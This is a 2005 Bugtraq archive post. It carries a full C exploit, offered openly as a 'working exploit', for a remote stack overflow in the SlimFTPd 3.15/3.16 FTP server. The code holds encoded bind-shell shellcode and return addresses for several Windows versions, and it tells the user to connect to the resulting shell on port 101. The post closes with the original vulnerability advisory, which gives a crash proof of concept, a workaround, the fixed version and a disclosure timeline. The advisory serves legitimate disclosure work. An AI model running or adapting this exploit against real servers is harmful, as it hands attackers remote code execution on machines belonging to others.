Home page logo
/

bugtraq logo Bugtraq mailing list archives

Arbitrary code execution in SlimFTPd v3.16 - Exploit
From: redsand () redsand net
Date: Sat, 23 Jul 2005 20:43:49 -0500 (CDT)



PUBLIC Working Exploit for this Vulnerability

http://redsand.net/code/redslim-slimftpd.c




/*
*
*       Written by redsand
*       <redsand () redsand net>
*
*       Jul 22, 2005
*       Vulnerable: SlimFtpd v3.15 and v3.16
*       origional vuln found by: Raphaël Rigo
*
*       Usage: ./redslim 127.0.0.1 [# OS RET ]
*
*/



#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN
  #include <winsock2.h>
  #include <windows.h>
// #pragma lib <ws2_32.lib> // win32-lcc specific
  #pragma comment(lib, "ws2_32.lib") // ms vc++
#else
  #include <unistd.h>
  #include <sys/socket.h>
  #include <sys/types.h>
  #include <arpa/inet.h>
  #include <netdb.h>
#endif


#define USERNAME        "anonymous"
#define PASSWORD        "log () in net"


// buf size = 512 + max

#define NOP                             0x90
#define BUFSIZE                 2048
#define PORT                    21
#define LSZ                             525

unsigned char *login [] = { "USER "USERNAME"\r\n", "PASS "PASSWORD"\r\n",
"LIST ", "XMKD AAAAAAAA\r\n", "CWD AAAAAAAA\r\n", NULL };

unsigned char *targets [] =
        {
            "Windows XP SP0/SP1 ",
                        "Windows XP SP2 ",
            "Windows 2000 SP1/SP4 ",
                        "Windows 2003 Server SP1",
                        "Denial-of-Service",
             NULL
        };

unsigned long offsets [] =
        {
                        // jmp esi
                        0x71a5b80b, // Windows XP 5.1.1.0 SP1 (IA32) Windows XP 5.1.0.0 SP0 (IA32)
                        0x77f1a322, // Windows XP 5.1.2.0 SP2 (IA32)
            0x74ffbb65, // Windows 2000 5.0.1.0 SP1 (IA32) Windows 2000
5.0.4.0 SP4 (IA32)
                        0x77f7fe67, // Windows 2003 Server 5.2.1.0 SP1 (IA32)
            0x44434241,
                        0
        };

unsigned char shellcode[] = "\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

long gimmeip(char *);
void keepout();
void shell(int);

void keepout() {
#ifdef WIN
   WSACleanup();
#endif
   exit(1);
}

void banner() {
        printf("- SlimFtpd v3.15 and v3.16 remote buffer overflow\n");
        printf("- Written by redsand (redsand [at] redsand.net)\n");
}

void usage(char *prog) {
  int i;
  banner();
  printf("- Usage: %s <target ip> <OS> [target port]\n", prog);
  printf("- Targets:\n");
  for (i=0; targets[i] != NULL; i++)
        printf("\t- %d\t%s\n", i, targets[i]);
  printf("\n");

  exit(1);
}

/***************************************************************/
long gimmeip(char *hostname) {
  struct hostent *he;
  long ipaddr;

  if ((ipaddr = inet_addr(hostname)) < 0) {
        if ((he = gethostbyname(hostname)) == NULL) {
           printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
           keepout();
        }
  memcpy(&ipaddr, he->h_addr, he->h_length);
  }

  return ipaddr;
}

int main(int argc, char *argv[]) {
  int sock;
  char expbuff[BUFSIZE];
  char recvbuff[BUFSIZE];
  void *p;
  unsigned short tport = PORT; // default port for ftp
  struct sockaddr_in target;
  unsigned long retaddr;
  int len,i=0;
  unsigned int tar;

#ifdef WIN
  WSADATA wsadata;
  WSAStartup(MAKEWORD(2,0), &wsadata);
#endif


  if(argc < 3) usage(argv[0]);

  if(argc == 4)
    tport = atoi(argv[3]);

  banner();
  tar = atoi(argv[2]);
  retaddr = offsets[tar];


  printf("- Using return address of 0x%8x : %s\n",retaddr,targets[tar]);
  printf("\n[+] Initialize socket.");
  if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("[x] Error socket. Exiting...\n");
        keepout();
  }

  memset(&target,0x00,sizeof(target));
  target.sin_family = AF_INET;
  target.sin_addr.s_addr = gimmeip(argv[1]);
  target.sin_port = htons(tport);


  printf("\n[+] Prepare exploit buffer... ");
  memset(expbuff, 0x00, BUFSIZE);
  memset(recvbuff, 0x00, BUFSIZE);


  memcpy(expbuff, login[2], strlen(login[2]));
  p =  &expbuff[strlen(login[2]) ];

  memset(p, NOP, LSZ);
  memcpy(&expbuff[10],shellcode,sizeof(shellcode)-1);

  *(unsigned long *)&expbuff[507] = retaddr;
  p =  &expbuff[511];
  memcpy(p, "\n",1);

  printf("\n[+] Connecting at %s:%hu...", argv[1], tport);
  fflush(stdout);
  if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
        fprintf(stderr,"\n[x] Couldn't establish connection. Exiting...\n");
        keepout();
  }
  printf(" - OK.\n");
  len = recv(sock, recvbuff, BUFSIZE-1, 0);
  if(len < 0) {
        fprintf(stderr,"\nError response server\n");
        exit(1);
  }

  printf("    - Size of payload is %d bytes",strlen(expbuff));


  printf("\n[+] Initiating exploit... ");
  printf("\n    - Sending USER...");
  if(send(sock,login[0],strlen(login[0]),0)==-1) {
        fprintf(stderr,"\n[-] Exploit failed.\n");
        keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE-1,0);
  if(len < 0) {
        fprintf(stderr,"\nError recv.");
        exit(1);
  }
  recvbuff[len] = 0;

  printf("\n    - Sending PASS...");

  if(send(sock,login[1],strlen(login[1]),0)==-1) {
    printf("\n[-] Exploit failed.\n");
        keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE, 0);
  if(len < 0) {
        fprintf(stderr,"\nError recv.");
        exit(1);
  }
  recvbuff[len] = 0;

  printf("\n    - Creating X-DIR...");

  if(send(sock,login[3],strlen(login[3]),0)==-1) {
    printf("\n[-] Exploit failed.\n");
        keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE, 0);
  if(len < 0) {
        fprintf(stderr,"\nError recv.");
        exit(1);
  }
  recvbuff[len] = 0;

  if(send(sock,login[4],strlen(login[4]),0)==-1) {
    printf("\n[-] Exploit failed.\n");
        keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE, 0);
  if(len < 0) {
        fprintf(stderr,"\nError recv.");
        exit(1);
  }
  recvbuff[len] = 0;

  printf("\n    - Sending Exploit String...");
  if(send(sock,expbuff,strlen(expbuff),0)==-1) {
        printf("\n[-] Exploit failed.\n");
        keepout();
  }

  printf("- OK.");

  printf("\n[+] Now try to connect to the shell on %s:101\n", argv[1] );



#ifdef WIN
  closesocket(sock);
  WSACleanup();
#else
  close(sock);
#endif

  return(0);
}







               Arbitrary code execution in SlimFTPd v3.16

                       discovered by Raphaël Rigo

Product: SlimFTPd by WhitSoft Development
Affected Version: 3.16 (verified), <=3.16 probably too
Not affected Version: 3.17
OS affected: All Win32
Risk: Critical
Remote Exploit: yes
URL: http://www.whitsoftdev.com/slimftpd/

Overview
========

SlimFTPd is a fully standards-compliant FTP server implementation with an
advanced virtual file system. It is extremely small, but don't let its
file
size deceive you: SlimFTPd packs a lot of bang for the kilobyte. It is
written
in pure Win32 C++ with no external dependencies and no messy installer.
SlimFTPd is a fully multi-threaded application that runs as a system
service on
Windows 98/ME or Windows NT/2K/XP, and it comes with a tool to simplify
its
installation or uninstallation as a system service. Once the service is
started, SlimFTPd runs quietly in the background. It reads its
configuration
from a config file in the same folder as the executable, and it outputs
all
activity to a log file in the same place. The virtual file system allows
you
to mount any local drive or path to any virtual path on the server. This
allows
you to have multiple local drives represented on the server's virtual file
system or just different folders from the same drive. SlimFTPd allows you
to
set individual permissions for server paths. Open slimftpd.conf in your
favorite text editor to set up SlimFTPd's configuration. The format of
SlimFTPd's config file is similar to Apache Web Server's for those
familiar
with Apache.

Vulnerability
=============

         An unchecked string concatenation allows a classic stack
overflow.

         Details :
         The handler for the LIST, DELE and RNFR commands builds a string
by
         concatenating the current directory with the requested dir/file.
         The requested and current directory can occupy up to 512 bytes,
as
         the destination buffer, which can therefore be overflowed.
         The minimal length for the current remote directory to allow
         exploitation is 8 chars.

         Risk : Critical
         The attacker may execute arbitrary code with the privileges of
the
         user the server is running as.
         This risk is mitigated by the need to be logged in.

         Proof of concept :
         ftp> open localhost
         Connected to localhost.
         220-SlimFTPd 3.16, by WhitSoft Development (www.whitsoftdev.com)
         220-You are connecting from localhost:2687.
         220 Proceed with login.
            User (localhost:(none)) : bleh
         331 Need password for user "bleh".
         Password :
         230 User "bleh" logged in.
         ftp> cd 123456789
          250 "/123456789" is now current directory.
         ftp> quote RNFR
123456789012345678901234567890123456789012345678901234
         5678901234567890123456789012345678901234567890123456789012345678901234
         5678901234567890123456789012345678901234567890123456789012345678901234
         5678901234567890123456789012345678901234567890123456789012345678901234
         5678901234567890123456789012345678901234567890123456789012345678901234
         5678901234567890123456789012345678901234567890123456789012345678901234
         5678901234567890123456789012345678901234567890123456789012345678901234
         5678901234567890123456789012345
         Connection closed.

         SlimFTPd crashes at eip 0x35343332.

         Workaround :
         Disable List and Write rights.

         Solution :
         Update to v3.17

         -----------------------------------------------------------------------

Acknowledgments
==============

Thanks to the developer for quick response and fix.

Timeline
========
2005-07-07        Discovery
2005-07-08        First attempt to contact developer
2005-07-08        Developer reply
2005-07-11        Fixed version 3.17 released
2005-07-21        Advisory published




  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault